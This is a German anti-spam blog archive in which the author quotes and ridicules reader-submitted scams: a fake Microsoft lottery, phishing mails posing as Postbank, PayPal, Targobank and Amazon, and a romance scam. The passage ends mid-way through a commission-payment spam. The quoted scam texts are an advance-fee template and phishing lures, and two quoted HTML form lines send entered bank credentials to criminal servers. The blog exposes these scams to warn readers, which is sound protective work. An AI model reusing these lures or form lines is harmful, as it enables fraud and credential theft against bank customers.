Kategoriearchiv „Leserpost“

Zweckmäßige Blödheit?

Mittwoch, 7. Oktober 2015

Ich habe eine E-Mail mit einer beachtenswerten Betrachtung der „Dummheit“ der meisten Spams bekommen, aus der ich hier ein längeres Zitat veröffentliche, weil es einen bedenkenswerten und von mir so noch nicht gedachten (und deshalb auch nicht verbloggten) Gedanken formuliert:

Beim Lesen deines Blogs kommen mir immer wieder philosophische Gedanken. Wie du war ich anfangs auch immer wieder entsetzt darüber, wieviel Dreck da täglich in meinem Eingangsfach landet – und auch wie blöd (oder bequem) diese Kriminellen sein müssen, dass sie nicht in der Lage sind, eine vernünftige Rechtschreibung hinzubekommen und sich durch viele billige und mit nur etwas mehr Mühe leicht vermeidbare Fehler so schnell verraten, dass es schon fast weh tut.

Aber nach all den Jahren habe ich inzwischen den Verdacht, dass Spam nicht deshalb so blöd ist, weil die Urheber es auch sind. Ich vermute eher, dass es den Kriminellen vielmehr darum geht, alle halbwegs Intelligenten von vornherein auszusortieren, weil diese als Zielgruppe ohnehin nicht infrage kämen. Denn in der Folge würde sonst viel zu viel Aufwand betrieben werden müssen, einen Coup bis zum erfolgreichen Abschluss durchzuziehen. Etwa beim üblichen Vorschussbetrug ist der Spammer ja darauf angewiesen, bei der nachfolgenden persönlichen Kontaktaufnahme so schnell und so einfach wie möglich zum Ziel zu kommen, da kann er keinen Argwohn brauchen. Einmal installierte Trojaner sollten natürlich möglichst lange unbemerkt laufen, da kann man keinen Anwender brauchen, der dann im Zweifel weiß, wie er die eingefangene Schadsoftware schnell wieder los wird, sollte er sie tatsächlich einmal mit „bitte hier klicken“ installiert haben. Und natürlich ist auch keinem Verbrecher damit gedient, wenn ein Opfer weiß, wie es sich ggf. durch Inanspruchnahme von Judikative und Exekutive gegen einen Betrug zur Wehr setzen kann.

Also ist die Rechnung simpel, aber effektiv: Die Erstkontaktaufnahme muss mit möglichst blödsinnigen Spams erfolgen, damit Menschen, die die korrekte Rechtschreibung einigermaßen beherrschen und darüber hinaus ein Mindestmaß an IT-Kompetenz besitzen, sich mit Grausen und Kopfschütteln abwenden – auf dass so nur noch die wirklich Dummen und Ungebildeten, die sich umso leichter über den Tisch ziehen lassen, auf die billigen Tricks hereinfallen.

Danke, T.! 😉

Microsoft Lotterie $450,000.00USD

Samstag, 19. September 2015

Betrübssysteme, Anwendungen, Lotterien… was Microsoft nicht alles macht. 😀

MICROSOFT® CORPORATIONS
11 Times Square
New York, NY 10036
United States
Tel: +1 (206) 855-xxxx

Schön, dass da die Anschrift von Microsoft steht! Es ist ja immer gut, wenn man eine Anschrift von Microsoft zur Hand hat. Wozu? Ach! Schade nur, dass diese Anschrift gar nicht zum Absender der Spam passen will, der eine längliche Mailadresse bei Google Mail hat.

MICROSOFT OFFICIAL PROMOTION

Aber in der Spam steht ja, dass es offiziell ist!

Und nach diesem lauwarmen Vorlauf kann sich der Spammer austoben und endlich etwas richtigen Text verfassen, und er erreicht dabei die volle „literarische“ Qualität einer Spam.

Es ist offensichtlich, dass diese Meldung wird Ihnen ?berraschen [sic!], aber bitte zu finden Zeit, es zu lesen Sie [sic!], wie wir begl?ckw?nschen Sie ?ber Ihren Erfolg in der folgenden amtlichen Ver?ffentlichung der Ergebnisse des E-Mail-elektronische Online-Gewinnspiel [sic!] 2014/2015 von Microsoft organisiert, in Verbindung mit der Stiftung zur F?rderung von Software-Produkten, (FSP) hielt diese 2015 in der Microsoft Head Quarters Washington USA, wo Ihre E-Mail-Adresse erwies sich als einer der Online-Gewinnende E-Mails [sic!] in der 4. Kategorie und daher zog eine Geldpreis von $ 450,000.00 (vier hundertf?nfzigtausend US-Dollar) Unsere Gewinner sind in vier Kategorien mit verschiedenen gewinnende Preise [sic!] entsprechend in den einzelnen Kategorien angeordnet. Sie werden in diesem Format weiter unten angeordnet:

KATEGORIE von Microsoft GEWINNER;

1. 5,000,000.00 USD
2nd. 2,000,000.00 USD
3rd. 1,000,000.00 USD
4.. 450,000.00 USD

Aha, „Microsoft“ macht also eine Reklamelotterie, von der man niemals etwas in einer Reklame hört, damit sie auch keine Reklamewirksamkeit habe. Verstehe!

Außerdem kann „Microsoft“ keine Umlaute codieren. Das zumindest erscheint ein bisschen glaubwürdig! 😀

Wir schreiben, um offiziell mitteilen, der diese Auszeichnung und beraten Sie gerne, um die Verarbeitung B?ro [sic!] sofort nach Erhalt dieser Nachricht um mehr Informationen betreffend die ?berpr?fung, Bearbeitung und eventuelle Zahlung der oben genannten Preises, Sie zu kontaktieren. Es ist wichtig zu beachten, dass Ihre preis Information wurde mit den folgenden Angaben, um es angebracht freigegeben.

(1). Auszeichnung Nummern: US / 149/2015
(2). E-Mail-Bonus-Zahlen: MSLP-1009021
(3). Chargennummern: MSFT / 421 / 8PDH
(4). Referenznummern: DL / 54/132/921 / MSOFT
(5). Seriennummern: MSFT / 2015 / NLP00292

Die Mailadresse, die gewonnen hat, wurde mit obskuren Nummern behängt, und weil das viel zu kompliziert wäre, nur eine obskure Nummer zu verwenden, gibt es derer gleich fünfe, um die möglichen Fehlerquellen bei der Verarbeitung zu vergrößern. Dabei wäre bereits die Mailadresse eindeutig gewesen.

Wer auf diese Spam zur Einleitung eines Vorschussbetruges reingefallen ist und die Augen voller Dollarscheine hat, kann sich jetzt datenmäßig vor ein paar Spammern entblößen:

Microsoft Verification Requirements

(1). Voller Name:
(2). Adresse:
(3). Staatsangeh?rigkeit / Geschlecht: [sic! Kombination!]
(4). Alter: [sic! Nicht Geburtsdatum!]
(5). Beruf: [sic! Unentbehrlich für Gewinnansprüche!]
(6). Telefon:
(7). Land:
(8). Wie sehen Sie als Microsoft-Sieger f?hlen: [sic!]
(9). ?berhaupt gewann eine Online Award oder Bonus: [sic!]
(10). Gewinnen E-Mail-Adresse: [sic!]

Da man bei Microsoft nicht dazu imstande ist, die Absenderadresse der zugesendeten Daten zu deuten, muss der sich als Microsoft-Sieger Fühlende und Sehende noch einmal seine Mailadresse in den verification requirements angeben, die für eine Verifikation ungefähr so wertvoll sind wie ein kleines Steak. Jeder könnte jede Angabe machen, die „Prüfung“ besteht darin, dass angegebene Daten geglaubt werden.

Aber der gläubige Empfänger der Spam glaubt ja auch, was in der Spam steht.

Bitte geben Sie Ihre Modus empfangen Ihre Gewinne.
(1) Kurier Lieferung Ihrer gewinn Scheck [sic!] an Ihre Heimatadresse.
(2) ?berweisung von Ihrem Geld auf Ihr Bankkonto in Ihrem Land.

Immerhin: Ein Kurier wird kommen aus den USA, tragend einen von Microsoft unterzeichneten Gewinn Scheck, zu bringen ihn zur Heimatadresse! Zu schade, dass die USA so rückständig sind, dass sie noch keinen versicherten Postversand kennen.

Um f?r Ihren Anspruch geltend machen, kontaktieren Sie bitte Ihren Microsoft US-Manager [sic!] f?r Anspr?che von Ihren Gewinn innerhalb Neunundzwanzig Arbeitstagen [sic!] nach dieser Gewinnbenachrichtigung. Gewinne, die nicht innerhalb Neunundzwanzig Arbeitstagen [sic!] nach Gewinnbenachrichtigung validiert werden, werden als nichtig bezeichnet [sic!] nicht beanspruchten Mittel werden von der Microsoft-Promotion Company liquidiert [sic!] werden. Sie sind verpflichtet, die oben genannten Angaben zu Ihrer Auszeichnung in jeder Korrespondenz zu erw?hnen, um mit den Manager-Validierung [sic!] Ihre Gewinne.

Kleiner Profitipp: Bitte nicht mit Microsoft Excel ausrechnen, wann die neunundzwanzig Arbeitstage abgelaufen sind. Die Funktion NETTOARBEITSTAGE() liefert verblüffend oft falsche Ergebnisse. 😉

Und natürlich auch nicht darüber nachdenken, wann die Frist begonnen hat, denn das wird in der Mail nicht erwähnt! Ist es das „Ziehungsdatum“ oder das Versanddatum der Spam?

HINWEIS:

(1). Um die Anspr?che der Verarbeitung Form, wenn Sie nicht in PDF-Dateien verwendet werden, zu f?llen, k?nnen Sie es ausdrucken und ausf?llen oder einfach kopieren Sie den gesamten Anzeigeschreiben entweder Microsoft Word oder Editor f?r einfachen Zugang [sic! Was zum Henker!].

(2). Leuten zu sagen, nicht ?ber Ihre Preis-Award, bis Ihr Geld erfolgreich an Sie ?bergeben zur Disqualifikation [sic!], die aus Doppelanspruch ergeben k?nnten, zu vermeiden. Sie k?nnen auch ?hnliche E-Mails erhalten von Leuten portr?tiert an andere Organisationen oder Microsoft Corporation sein. Dies ist ausschlie?lich auf Ihre pers?nlichen Informationen von Ihnen sammeln und beanspruchen ?ber dem Mitteilungsschreiben, die Sie von uns geschickt wurde, wird von Microsoft nicht f?r den Verlust von Fonds, die aus der oben genannten Verantwortung gezogen werden.

So, und jetzt glauben, schweigen und das „Formular“ aus der Spam in Microsoft Word kopieren, um es auszufüllen!

Dr. Steven Eric
General Manager, Online Division, US
E-mail: eric (punkt) steven22 (at) outlook (punkt) com

Mit Gruß vom „echten“ Manager vom „echten“ Microsoft, der einen „echten“ Doktor vor seinem Namen stehen hat, der aber leider nicht über eine Mailadresse @microsoft.com verfügt.

The Microsoft Internet E-mail lottery Awards is sponsored by our CEO/Chairman, Satya Nadella and a consortium of software promotion companies like Intel Group, Acer, H P, Toshiba, Pisem, Aol, Dell Computers and other International Companies.

Erstaunlich, dass keine dieser Unternehmungen Reklame damit macht, dass sie eine Reklamelotterie macht, bei der irgendwelchen Menschen ein paar Millionen Dollar in die Hand gedrückt werden…

Wie Satya Nadella wird der dritte CEO von Microsoft, bringt er einen unerbittlichen Antrieb [sic!] f?r Innovation und den Geist der Zusammenarbeit, um seine neue Rolle. Er trat Microsoft vor 23 Jahren [sic! Ich habe Microsoft in den letzten zwanzig Jahren auch öfter treten wollen…], weil er sah, wie klar Microsoft bef?higt Menschen, magische Dinge zu tun [sic!] und schlie?lich die Welt zu einem besseren Ort. Viele Unternehmen, sagt er, „streben, die Welt zu ver?ndern. Aber nur sehr wenige haben alle Elemente ben?tigt: Talente, Ressourcen und Ausdauer. Microsoft hat bewiesen, dass sie alle drei in H?lle und F?lle.

Was für gute Menschen! Und ich dachte immer, denen ginge es darum, aus der künstlich hergestellten und mit teils grenzkriminellen Mitteln aufrecht erhaltenen Abhängigkeit ihrer Nutzer so viel Reibach wie möglich zu machen.

Der Microsoft Internet-E-Mail-Auslosung wird in regelm??igen Abst?nden statt [sic!] und wird organisiert, um die Nutzung des Internet zu f?rdern und zu f?rdern Computerkenntnisse weltweit, wieder einmal im Auftrag des Staffs und Mitglieder des Microsoft GB Vorstands Kommission Herzlichen Gl?ckwunsch.

Tja, und wenn dieses „Microsoft“ auch nur ein paar hundert Dollar dafür ausgeben würde, einen Dolmetscher zu entlohnen, dann klänge diese Mail „von Microsoft“ sogar verständlich und halbwegs ernsthaft. Leider verlost „Microsoft“ jeden überschüssigen Cent in regelmäßigen Abständen bei irgendwelchen E-Mail-Auslosungen, von denen man nur aus seiner Spam erfährt.

Mit freundlichen Gr??en,

Owen Sagness
General Manager of Advertising and On-line [sic!]
Microsoft Corporations®

Wie wäre es dann, einfach bei einer Grußformel und einem Manager zu bleiben? Ach, dafür müsste man die Sprache, in der man spammt, verstehen… ich verstehe! 😀

This email has been protected by YAC (Yet Another Cleaner) http://www.yac.mx

Der Absender dieser Spam geht davon aus, dass der Empfänger dieser Spam vermuten könnte, dass Schadsoftware mit dieser Spam transportiert werden könnte und schreibt deshalb einen dummen Werbespruch für ein Produkt, dessen Anbieter sich einen „beachtlichen“ Ruf im „Web of Trust“ erworben hat: Als Betrüger, Verbreiter von Schadsoftware und „Softwaredieb“, der den Leuten sein Zeugs mit irreführenden Behauptungen andreht.

Aber um den Kontakt mit derartigem Geschmeiß zu vermeiden, verzichtet man ja auch darauf, in eine Spam zu klicken…

Dieser Großgewinn aus der täglichen Spamlotterie ist ein Zustecksel meines Lesers G.K. Danke!

Stagefright-Virus bedroht ihr Konto

Dienstag, 11. August 2015

Das Wichtigste vorab: Diese E-Mail kommt nicht von der Postbank. Es ist Phishing und der Versuch, ihnen einen Trojaner unterzujubeln. Löschen sie diese E-Mail! Wenn sie das mir als „irgendeinem dahergelaufenen Blogger“ nicht glauben wollen (was durchaus vernünftig ist, denn sie kennen mich nicht und ich kann ein beliebiger Vollidiot sein), überzeugen sie sich davon, indem sie kostenlos bei der Postbank-Hotline für Sicherheitsfragen unter der Telefonnummer 0800 1008906 anrufen und dort noch einmal nachfragen! Und nachdem sie dort die Bestätigung gehört haben, löschen sie diese Spam! Die Postbank versendet solche E-Mails nicht. Kommen sie auf gar keinen Fall auf die Idee, wegen einer E-Mail einer Bank irgendwelche Daten irgendwo einzugeben! Egal, was der Grund dafür sein soll! Es ist eine sehr schlechte Idee, die sie viel Geld kosten kann und ihnen monatelangen Ärger aller Art einbringen kann. Und wenn sie schon die Hotline anrufen, stellen sie dort auch gleich die Frage, warum vor dieser sehr gefährlichen laufenden Betrugsnummer noch nicht prominent auf der Kundenwebsite der Postbank gewarnt wird, denn zurzeit scheint bei der Postbank noch niemand auf diese naheliegende Idee gekommen zu sein – obwohl dort ansonsten geradezu vorbildlich auf gängige Betrugsmaschen hingewiesen wird. Eine prominent platzierte Warnung könnte so viel Schaden verhindern und kostet dabei so wenig Aufwand…

So, jetzt aber…

Es war ja klar, dass die Spammer darauf aufspringen würden. Wer auch nur eine Spur Verantwortung fühlt, wird allerdings niemals auf die Idee gekommen sein, seine Kontoführung mit einem Wischofon¹ zu machen – denn in diesen werksseitig funktionslimitierten Computern für Dumme verbindet sich die Security-Blauäugigkeit der Neunziger Jahre mit der technisch kompetenten organisierten Kriminalität der Zehner Jahre.

Tja, und wer seine Kontoführung nicht mit so einem gefährlichen Spielzeugtelefon macht, der lacht schon beim Anblick des Betreffs, lehnt sich zurück und hat eine Möglichkeit weniger, mit derart plumpen Nummern überrumpelt zu werden.

Diese Spam habe ich übrigens nicht selbst empfangen, sie wurde mir von einem Freund mit Konto bei der Postbank zugesteckt, der schon wegen des…

Von: „Postbank.de“ <do-not-reply@postbank.de>

…in der Spam angegebenen Absenders verunsichert war, ob sie nicht echt sein könnte. Ich hoffe, er hat sich jetzt für alle Zeiten gemerkt, das der Absender einer E-Mail ohne Aufwand gefälscht werden kann und somit gar nichts über die Herkunft einer E-Mail sagt. Was Banken tun können, um solche Verunsicherungen bei Empfängern von kriminellen Phishing-Spams zu verhindern, habe ich schon vor vier Jahren geschrieben und werde es hier nicht wiederholen. Dass die meisten Banken immer noch nichts tun, ist ein Beleg dafür, dass ihnen ihre Kunden egal sind und dass sie sich nicht daran stören, wenn Kriminelle das Geld ihrer Kunden für dicke Autos, Kokain und Prostituierte ausgeben können. Als Kunde einer solchen Bank würde ich die darin ausgedrückte Verachtung in vollem Umfang zurückgeben und mir einen seriöseren Dienstleister für meine Geldsachen suchen.

Sehr geehrte/r Kunde,

Weder kennt diese „Postbank“ den Namen des Empfängers, noch macht sie eine Angabe, auf welches Konto sich diese Mail bezieht². Spätestens an dieser Stelle sollte jedem Empfänger klar sein, dass es sich um eine Spam handelt.

Die Postbank Sicherheitszentrale [sic! Deppen Leer Zeichen] warnt vor einer Sicherheitslücke beim Smartphone-Betriebssystem Android von Google. Hacker könnten die Daten einfach per MMS stehlen [sic!] und ihr Handy karpern. Der Virus schleicht sich von alleine in ihr System [sic! Komma fehlt.] ohne dass Sie es bemerken.

Ich gehe darauf inhaltlich nicht weiter ein, außer vielleicht diese eine Kleinigkeit: Es geht bei Stagefright nicht um „Daten per MMS stehlen“, sondern um „beliebigen Code in eine MMS (oder ein irgendwie, zum Beispiel bei einem Hangout, vom Wischofon verarbeitetes Video) einbetten und unbemerkt ausführen“. Der „Postbank Sicherheitszentale“ aus der wirren Kopfwelt dieser Spammer scheint das nicht so völlig klar zu sein, und offenbar setzen die Kriminellen auch darauf…

Einen ausführlichen Bericht über den Stagefright Virus finden sie auf Hier [sic!]

…dass ihre Opfer mit dem verlinkten Artikel auf Zeit Online intellektuell überfordert sind. Das sind ja immerhin Buchstaben, die Text formen, der gelesen werden will – und übrigens recht unklar ist, da er mutmaßlich von einem Journalisten ohne vertiefte technische Kenntnisse verfasst wurde. Eine etwas klarere Darlegung gibt es bei Heise Online.

So schützt die Postbank Sie!

1. Wenn Sie im Besitz einen Android-Handys dann folgen Sie bitte den Anweisungen!

Aha, die „Postbank“ schützt mich, indem ich den Anweisungen folge. Vielleicht sollten die „Sicherheitsexperten“ dort mal einen Deutschexperten einstellen, damit die Formulierungen nicht so mies klingen… 😀

2. Klicken Sie „hier“ oder öffnen Sie die Datei in ihrem E-Mail Anhang!

Ein Klick auf „Click here“ in einer digital unsignierten Mail eines Unbekannten ist immer ein ganz besonders großer Beitrag zur Computersicherheit…

3. Füllen Sie alle Daten aus und bestätigen Sie auf „Daten absenden“

Ich denke, die „Postbank“ will mich schützen. Stattdessen soll ich einen Anhang öffnen und ausfüllen. Dieser Anhang ist übrigens eine HTML-Datei. Wer Interesse daran hat: den Quelltext habe ich bei Pastebin hochgeladen. Das Wichtigste steht in Zeile 110, ich habe hier mal den interessanten Teil isoliert:

<form ... action="http://b.adress-datenabgleich.com/postbank_check.php" ...>

Die eingegebenen Daten gehen nicht an einen Server in der Domain der Postbank, sondern über die obskure und vor ein paar Tagen anonym registrierte Domain adress (strich) datenabgleich (punkt) com an einen von Verbrechern kontrollierten Server, der zu diesem Zeitpunkt erfreulicherweise schon vom Internet genommen wurde. (Ein Dank an den Hoster für die schnelle Reaktion! Aber es kann ja auch nicht jeder so langsam wie die Postbank sein, wenn millionenfacher Betrug durchgeführt wird…)

Welche Daten das sind? Diese Daten hier:

Screenshot des Anhanges mit einer Phishing-Seite im Design der Postbank. Unter der Überschrift 'Postbank Stagefright Virus entfernen' soll die E-Mail-Adresse, die Kontonummer und ein Passwort oder eine PIN eingegeben werden.

Wer den Verbrechern so Zugriff auf das Postbank-Konto gegeben hat und ihnen bestätigt hat, unter welcher Adresse die Spam ankommt und beklickt wird, darf sich schon „freuen“:

Der nigelnagelneue Trojaner, den garantiert noch kein Antivirus-Schlangenöl kennt, wird gleich hinterhergeliefert.

Wir senden ihnen umgehend eine E-Mail mit einer Software mit der Sie den Stagefright-Virus entfernen können.

Die allerdings sehr naheliegende Frage, warum die „Postbank“ nicht gleich jedem ihrer angemailten Kunden eine E-Mail mit einer derartigen Software zusenden sollte, die beantwortet der freundliche Phisher und Cracker nicht.

Übrigens ist „Stagefright“ kein Virus, außer vielleicht in einem eher skurillen Sinn des Wortes. Es ist eine schwere, auf vielerlei Wegen ausbeutbare Sicherheitslücke in Android.

Mit freundlichen Grüßen
Ihre Sabine Heinel
Postbank Newsletter-Redaktion

Wenn das die Freundlichkeit ist, will man den Hass nicht mehr kennenlernen.

¹Wischofon ist mein deutsches Wort für das Reklamewort „smart phone“. Es bezeichnet den Gegenstand nach der Tätigkeit, die am häufigsten auf ihn ausgeführt wird: Wischen mit den Fingern. Ich meine das nicht als Schimpfwort.

²Es ist gar nicht selten, dass jemand mehrere Konten hat.

Wichtig: Datenspeicherung

Donnerstag, 16. Juli 2015

Diese E-Mail mit dem gefälschten Absender service (at) paypal (punkt) com kommt natürlich nicht von PayPal, sondern von Kriminellen – und darin ist eine sehr originelle Phishing-Masche, von der ich erwarte, sie in den nächsten Tagen noch häufiger zu sehen:

Die schwarzen Balken sind von mir. Die Spam kommt mit namentlicher Ansprache.

Natürlich ist die in der BRD eventuell demnächst geltende Vorratsdatenspeicherung völlig irrelevant für ein Unternehmen wie PayPal, das seinen Sitz in Luxemburg hat. Aber auch, wenn PayPal in der BRD ansässig wäre: Die Vorratsdatenspeicherung ist in diesem Zusammenhang eine idiotische Begründung für eine Dateneingabe. PayPal speichert sowieso die Kundendaten und die Geschäftsvorfälle, das ist auch erforderlich, um die Dienstleistung PayPals anbieten zu können, während das neue Menschenüberwachungsgesetz der Bundesrepublik Deutschland Anbieter von Kommunikationsdienstleistungen zu einer anlasslosen, vollständigen und betrieblich sinnlosen Überwachung ihrer Kunden verpflichtet.

Darüber hinaus sollte sich jeder PayPal-Kunde im Klaren sein, dass PayPal nach eigenen Angaben derartige E-Mails niemals an seine Kunden versendet:

Wir fordern Sie nie auf, persönliche Daten direkt auf einer Website einzugeben. Wenn wir Ihre Hilfe benötigen, fragen wir Sie immer über eine Nachricht in Ihrem PayPal-Konto

Mit diesem Wissen ist es eine Kleinigkeit, jede Phishing-Spam für PayPal-Kunden zu erkennen und direkt ins Tönnchen zu befördern. Auch, wenn sie originell formuliert ist, in überzeugendem Design kommt und eine namentliche Ansprache hat.

Die Regel lautet: Es kommt angeblich von „PayPal“, fordert mich auf, Daten herzugeben (zu „bestätigen“, zu „verifizieren“, „abzugleichen“ und vieler Unfug mehr) und enthält etwas zum Draufklicken, wo ich das tun soll? Das bedeutet, dass es sich um Phishing handelt.

Diese Spam ist ein Zustecksel meines Lesers E.T.

Targobank – Datenabgleich

Samstag, 4. Juli 2015

Aber ich bin da doch gar nicht Kunde. 😉

Absender: Targobank <direkt (at) targobank (punkt) de>

Dieser Absender ist gefälscht. (Jeder Absender in einer Spam ist gefälscht.) Diese E-Mail kommt nicht von der Targobank.

Screenshot der Darstellung der HTML-formatierten Spam in der Mailsoftware

Hui, Design!

Ich halte diese Phishing-Spam für gefährlich, weil sie überdurchschnittlich gut gemacht ist. Wer Kunde bei der Targobank ist und darauf reingefallen ist, sollte sich sofort mit der Bank in Verbindung setzen, um den Schaden zu minimieren.

Sehr geehrte Damen und Herren,

Genau mein Name!

Eine richtige Bank würde ihre Kunden natürlich mit Namen ansprechen, und weil gar nicht so wenige Kunden mehrere Konten haben, würde sie auch noch erwähnen, auf welches Konto sich die Mail bezieht.

Ein Spammer kann im Allgemeinen – wenn er nicht aus einem Hack oder anderen Quellen eine Zuordnung von Mailadressen zu Bankdaten hat – nicht wissen, welche Kontonummer seine Empfänger haben. Ein vorsichtiger Umgang mit Bankdaten und die Verwendung einer eigenen E-Mail-Adresse ausschließlich für die Kommunikation mit der Bank sind ein wichtiger und sehr wirksamer Schutz gegen Phishing.

unser System hat festgestellt das Ihr Telefon-Banking PIN aus Sicherheitsgründen geändert werden muss.

Da bin ich aber froh, dass „euer System“ nicht festgestellt hat, dass ich ohne Grund 20.000 Øre berappen muss!

Bitte nutzen das unten angefügte Formular um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

Das „unten angefügte Formular“ ist eine an die Spam angehängte HTML-Datei, die im Browser so aussehen würde¹:

Das Wichtigste daran ist, wo die eingegebenen Daten hingehen. Diese Frage beantwortet sich leicht durch einen Blick in den Quelltext der HTML-Datei:

<form [...] method="POST" action="http://a.dbbanking.ru/de/targo/login/targo.php"  >

Die Daten gehen also nicht zum Server der Targobank, sondern zum Server unter der von Kriminellen kontrollierten, russischen Domain a (punkt) dbbanking (punkt) ru. Das ist auch der Grund, weshalb man der „Targobank“ so viele Dinge sagen soll, die die richtige Targobank längst kennt, wenn man dort Kunde ist, zum Beispiel die eigene Kontonummer. Allein die hier angegebenen Daten reichen für die Übernahme des Kontos durch die Kriminellen, und ich bin mir sicher, dass nach dem Absenden noch weitere Daten für eine angebliche „Sicherheitsprüfung“ abgefragt werden – sehr beliebt sind wegen ihrer „vielseitigen kriminellen Verwendbarkeit“ Kreditkartendaten.

(Hinweis: Andernfalls belasten wir Ihr Konto mit 18,99€ und fordern die Änderung schriftlich über den Postweg bei Ihnen an.)

Damit ein Mensch auch so wirklich doof wird, darauf reinzufallen, wird er mit technokratischen Entgelt-Forderungen gefügig gemacht – so frei nach dem Motto: „Wir haben ein Sicherheitsproblem, zahlen sie bitte grundlos zwanzig Euro. Die Gebührentabelle, nach der wir dieses Geld erheben, haben wir uns einfach aus dem Hintern gezogen“.

Es handelt sich übrigens um langsame Verbrecher:

Ihren Telefon-Banking PIN können sie hier, oder wie folgt ändern:

1. Öffnen Sie die Datei im Anhang Ihrer Email und wählen Sie „öffnen mit“ aus.
2. Füllen Sie alle vorgesehenden Felder aus und klicken dann auf „Daten absenden“..
3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7 Werktagen.

Die brauchen fast eine Woche, bis sie alles aus dem Konto rausgeholt haben, was sie rausholen wollen.

Für weitere Fragen ist unser Online Support unter: direkt (strich) pin (at) targobank (punkt) de 24Std. für Sie erreichbar.

Was, die sind nur 24 Stunden erreichbar? Und wenn die Frage einen Tag später kommt, hat man eben Pech gehabt? Tja, so etwas kommt raus, wenn die Phisher in Sprachen schreiben, deren Subtilitäten sie nicht verstehen. Ein Autor, der Deutsch kann, hätte „rund um die Uhr“ geschrieben und nicht das irreführende Ergebnis aus einer Computerübersetzung verwendet.

Es ist wieder einmal wie so oft bei den Phishing-Spams: Wenn der eigentliche Phishing-Kram formuliert ist, werden die Spammer oft ein wenig nachlässig und ihnen passieren kleine und zuweilen auch große und sehr peinliche Fehler. Wer sich nicht in Panik versetzen lässt (Sicherheitsmaßnahme der Bank, das wird teuer, wenn ich nicht reagiere) und gründlich liest, wird beinahe jede Phishing-Spam an solchen Details erkennen.

Targobank AG & Co. KG
Kasernenstr. 10
40213 Düsseldorf

Ihre Targobank

Wer es jetzt immer noch nicht bemerkt hat: Die Targobank hat mit dieser Spam nichts zu tun. Es ist eine Mail von Verbrechern, die ihre kriminellen Geschäfte mit fremden Konten machen wollen und die das Geld anderer Leute bei Koks und Nutten verprassen wollen.

Beratungstermin kostenlos unter:
info (at) targobank (punkt) de

Copyright © 2013 TARGOBANK

Oh, eine Mail von 2013 diente den Spammern als Vorlage… 😉

¹Ich rate strikt davon ab, Anhänge aus Spams zu öffnen, wenn man nicht weiß, wie man ein gut gesichertes System herstellt. Ein Virenscanner und eine „personal firewall“ machen kein gut gesichertes System. Das bisschen befriedigte Neugierde ist den möglichen Ärger niemals wert.

Diese Spam ist ein Zustecksel meines Lesers M.S.

Amazon Konto Verifikation!

Freitag, 5. Juni 2015

Diese Mail fällt nicht nur wegen ihres doofen Betreffs auf, sondern auch dadurch, dass 461 Mailadressen als Empfänger eingetragen sind, was natürlich den gewünschten Eindruck von „Amazon schreibt mich an, weils ein Problem mit meinem Account gibt“ zerstört. Die tiefere Bedeutung der Header-Zeile BCC muss sich der Spammer noch einmal von einem Achtjährigen erklären lassen.

Der Text ist dann auch genau so doof, wie es diese Mail schon auf dem ersten Blick verspricht:

Hallo lieber Amazon User ,
Sie müssen eine Verifikation Durchführen , weil leider alle Amazon
Daten Verloren Gingen.
Wir bitten sie auf der Angegebenen Webseite ( Siehe Unten ) , Den Link
zu öffnen , und sich dort einzuloggen und ihre daten erneut ein zu
geben.

Der Link zur Verifikation:
http://amzn.co.at/index/?[ID entfernt]

Mit Freundlichen Grüßen,
Ihr Amazon CO Team.

So so, leider sind alle Amazon-Daten verlorengegangen… 😀

Gut, dass darauf niemand reinfallen kann, weil es so krachend dumm ist!

Die verlinkte Website „verzichtet“ auf normales HTML und erzeugt ihre „Inhalte“ aus mit Javascript entschlüsselten, zuvor verschlüsselten Daten. 😯

Das ist natürlich ein bisschen… verdächtig, denn ein Phisher brauchte sich niemals solche Mühe zu geben. Mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich hier um einen Versuch, dem Besucher Schadsoftware zu installieren. Ich bin gerade viel zu unmotiviert, die vorsätzlich kryptischen Methoden zu analysieren, um nachzuschauen, was genau getan wird und ob es am Ende wenigstens zum Schein noch eine Phishing-Seite gibt und begnüge mich mit der Einsicht, dass dumm formulierte und technisch mies gemachte Phishing-Spams zurzeit manchmal auf perfide ausgearbeitete und wahrscheinlich hochinfektiöse Seiten führen. Oder: Auch den scheinbar dümmsten Spammer darf man nie unterschätzen.

Und deshalb klickt man niemals, niemals, niemals in eine Spam – und erlaubt auch generell nicht jeder dahergelaufenen Website die Ausführung von Javascript-Code im Browser. Ein Browser-Addon wie NoScript ist eine unverzichtbare Sicherheitssoftware, die derartige Angriffe an der Wurzel verhindert, selbst, wenn die Schadsoftware so aktuell sein sollte, dass der Virenscanner keine Chance hätte.

Diese Spam aus dem Beklopptenbrutschrank des Internet ist ein Zustecksel meines Lesers E.T.

Hallo Schatz.

Donnerstag, 21. Mai 2015

Hallo Schatz.
Kompliment des Tages, ich hoffe, Sie sind dort drüben geht es gut, ich werde mich gerne bei Ihnen vorstellen, mein Name ist Rebecca Edmond Einzel
nie zu heiraten, denn es ist mir eine Freude, Sie schreiben, ich liebe es mich wirklich interessieren, in qui MIT Kommunikation / Freundschaft mit Ihnen, wenn Sie-haben den Wunsch mit mir, bitte ich werde wie Sie, um mich wieder mit diesem Kontakt
meine Email-Adresse, so Abebooks Bahn kennen zu lernen einander besser, teilen unsere Gefühle und Ideen. Ich werde mich sehr freuen, wenn Sie mich durch meine E-Mail für die Kommunikation Einfachste schreiben
und um Ihnen mehr über mich erzählen und Ihnen meine Bilder, werde ich
die darauf warten, von Ihnen zu hören, Dank und einen schönen Tag,
dein neuer Freund.
Rebecca Edmond.

Ohne Worte.

Diese Spam, deren Sprache mindestens sieben Schwitt auf der nach oben offenen Dada-Skala erreicht, ist ein Zustecksel meines Lesers R.R.F.

Jüngste Provisionszahlung: 14.479€

Dienstag, 21. April 2015

Oh, alles für mich?!

Hallo,

Genau mein Name. Und, um was geht es?

Dies ist eine Beschreibung einer aktuellen Auftrag, eines unserer Mitglieder zu zahlen:

5. März 2015 02.39.31 EST
Transaction ID: 9DS42319C81228351

Aha, um eine Zeitangabe aus einer fernen Zeitzone und eine fröhliche Folge von Ziffern und Buchstaben. Alles für Hallo. Und für eine wehrlose Mailadresse.

Und, um was geht es dabei?

Sie haben geschickt ein automatisches Zahlung direkt worden auf Ihre Provisionen zu berücksichtigen. Hier sind die Details:

Betrag: € 14,479.00 USD
Um Provisions Konto
Für: Commissions (22.02 – 01.03)
Automatische Zahlungsnummer : 1W4G32PFH1
Zahlungsweise: Wöchentlich
Nächste Fälligkeit: 8. März 2015

